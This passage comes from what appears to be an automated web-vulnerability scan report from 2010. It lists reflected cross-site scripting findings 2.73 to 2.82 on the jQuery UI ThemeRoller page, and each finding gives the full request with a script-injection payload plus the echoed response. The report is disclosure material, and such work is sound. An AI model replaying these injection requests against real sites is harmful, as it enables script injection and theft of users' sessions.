Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
nt=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFFc86ff"><script>alert(1)</script>44c93a3107d&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgO
...[SNIP]...

2.73. http://jqueryui.com/themeroller/ [iconColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803b3"><script>alert(1)</script>16217d3125f was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000803b3"><script>alert(1)</script>16217d3125f&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000803b3"><script>alert(1)</script>16217d3125f&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px
...[SNIP]...

2.74. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da533"><script>alert(1)</script>98ab798f7d6 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFFda533"><script>alert(1)</script>98ab798f7d6&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFFda533"><script>alert(1)</script>98ab798f7d6&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.p
...[SNIP]...

2.75. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10a11"><script>alert(1)</script>f172063c345 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B1000010a11"><script>alert(1)</script>f172063c345&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B1000010a11"><script>alert(1)</script>f172063c345&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

2.76. http://jqueryui.com/themeroller/ [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88141"><script>alert(1)</script>d9f5706c1f3 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF88141"><script>alert(1)</script>d9f5706c1f3&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF88141"><script>alert(1)</script>d9f5706c1f3&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_so
...[SNIP]...

2.77. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c01bb"><script>alert(1)</script>9b3eca5e28b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?c01bb"><script>alert(1)</script>9b3eca5e28b=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:51:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&c01bb"><script>alert(1)</script>9b3eca5e28b=1" type="text/css" media="all" />
...[SNIP]...

2.78. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7177c"><script>alert(1)</script>9758f4953a3 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px7177c"><script>alert(1)</script>9758f4953a3&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px7177c"><script>alert(1)</script>9758f4953a3&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

2.79. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5167"><script>alert(1)</script>0387f9320ec was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2pxb5167"><script>alert(1)</script>0387f9320ec&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2pxb5167"><script>alert(1)</script>0387f9320ec&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

2.80. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cd2d"><script>alert(1)</script>4975e57d1e5 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=356cd2d"><script>alert(1)</script>4975e57d1e5&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=356cd2d"><script>alert(1)</script>4975e57d1e5&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" med
...[SNIP]...

2.81. http://jqueryui.com/themeroller/ [opacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 627d6"><script>alert(1)</script>c245b5368fc was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100627d6"><script>alert(1)</script>c245b5368fc&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
conColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100627d6"><script>alert(1)</script>c245b5368fc&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

2.82. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5b8"><script>alert(1)</script>939b7359cb6 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderCol